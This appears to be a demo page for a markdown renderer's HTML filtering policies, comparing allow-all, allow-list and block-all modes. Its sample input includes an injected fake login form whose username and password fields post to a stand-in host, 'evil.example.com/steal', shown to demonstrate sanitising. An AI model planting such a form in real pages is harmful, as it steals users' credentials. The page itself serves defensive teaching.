FIG-001/ UNRESTRICTED

allow all html.

Every HTML tag survives into the DOM. Iframes load, forms render, styles apply — only safe with content you fully trust.

  • Default behaviour — every HTML tag is rendered through its built-in renderer including iframe, form, and style.
  • Only safe for content you fully trust. Untrusted markdown can inject phishing forms, redirect users, or load tracking pixels.
↩ all examples
policy · allow-all-html mode · live running source
POLICY / UNRESTRICTED trusted content only

HTML Filtering Demo

This paragraph has bold and italic markdown formatting.

This is inside a trusted HTML div element.

HTML strong tag and HTML em tag.

Click to expand Hidden content inside details/summary tags.
Fake login injected by untrusted markdown
category · unrestricted
sheet · sheet 01 / 03
⟳ to re-run
FIG-002/ SAFE-ONLY

allow only safe tags.

Allow-list a tight set of formatting tags via allowHtmlOnly. Script, iframe, and anything else dangerous drops silently.

  • Pass a tag allow-list to allowHtmlOnly — only those tags render, everything else drops out silently.
  • The right default for user-generated content. Keeps formatting like <strong>, <em>, and <a> while killing script + iframe vectors.
↩ all examples
policy · allow-only-safe mode · live running source
POLICY / SAFE ONLY allowHtmlOnly

HTML Filtering Demo

This paragraph has bold and italic markdown formatting.

This is inside an allowed HTML div element.

HTML strong tag and HTML em tag.

Click to expand Hidden content inside details/summary tags.
<iframe src="https://example.com" title="example iframe"><iframe src="https://example.com" title="example iframe"></iframe><form action="https://evil.example.com/steal" method="POST">Fake login injected by untrusted markdown<input type="text" placeholder="Username"><input type="text" placeholder="Username"/></input><input type="password" placeholder="Password"><input type="password" placeholder="Password"/></input><button type="submit">Sign in</button></form>
category · safe-only
sheet · sheet 02 / 03
⟳ to re-run
FIG-003/ BLOCKED

block all html.

Strip every HTML tag via buildUnsupportedHTML — markdown formatting only, raw HTML stripped from the output.

  • buildUnsupportedHTML() returns a renderer map that drops every HTML tag — only markdown formatting survives.
  • Best when the source is a markdown editor with no need for raw HTML. Smallest attack surface, predictable output.
↩ all examples
policy · block-all-html mode · live running source
POLICY / HTML BLOCKED buildUnsupportedHTML

HTML Filtering Demo

This paragraph has bold and italic markdown formatting.

<div> This is inside a raw HTML div element. </div>

<strong>HTML strong tag</strong> and <em>HTML em tag</em>.

<details><summary>Click to expand</summary> Hidden content inside details/summary tags. </details><iframe src="https://example.com" title="example iframe"><iframe src="https://example.com" title="example iframe"></iframe><form action="https://evil.example.com/steal" method="POST"><strong>Fake login injected by untrusted markdown</strong><input type="text" placeholder="Username"><input type="text" placeholder="Username"/></input><input type="password" placeholder="Password"><input type="password" placeholder="Password"/></input><button type="submit">Sign in</button></form>
category · blocked
sheet · sheet 03 / 03
⟳ to re-run

HTML Filtering